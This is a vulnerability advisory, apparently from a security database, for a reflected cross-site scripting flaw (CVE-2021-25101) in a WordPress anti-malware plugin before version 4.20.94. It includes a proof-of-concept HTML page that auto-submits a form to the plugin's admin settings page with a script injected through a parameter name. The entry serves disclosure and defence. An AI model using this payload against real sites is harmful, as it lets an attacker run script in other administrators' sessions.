Lucene search
JrXnmWPEX-ID:5FD0380C-0D1D-4380-96F0-A07BE5A61EBAHistoryJan 24, 2022 - 12:00 a.m.
Anti-Malware Security and Brute-Force Firewall < 4.20.94 - Admin+ Reflected Cross-Site Scripting
2022-01-2400:00:00
JrXnm
108
0.001 Low
EPSS
Percentile
25.0%
The plugin does not sanitise and escape the POST data before outputting it back in attributes of an admin page, leading to a Reflected Cross-Site scripting. Due to the presence of specific parameter value, available to admin users, this can only be exploited by an admin against another admin user.
The GOTMLS_mt parameter value is retrieved when being logged in as admin and view the source code of /wp-admin/admin.php?page=GOTMLS-settings for example. Then, use the code below to XSS another admin
<html>
<body>
<form action="https://example.com/wp-admin/admin.php?page=GOTMLS-settings&GOTMLS_mt=dd950912e933626ba251bed092e2f9ba&scan_what=2" id="hack" method="POST">
<input type="hidden" name='x"><script>alert(/XSS/);</script>' value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
<script>
var form1 = document.getElementById('hack');
form1.submit();
</script>
</html>
Related
wpvulndb
wpvulndb
openvas
openvas
cve
cve
CVE-2021-25101
2022-02-21 11:15:08
prion
prion
Cross site scripting
2022-02-21 11:15:00
cvelist
cvelist
patchstack
patchstack
nvd
nvd
CVE-2021-25101
2022-02-21 11:15:08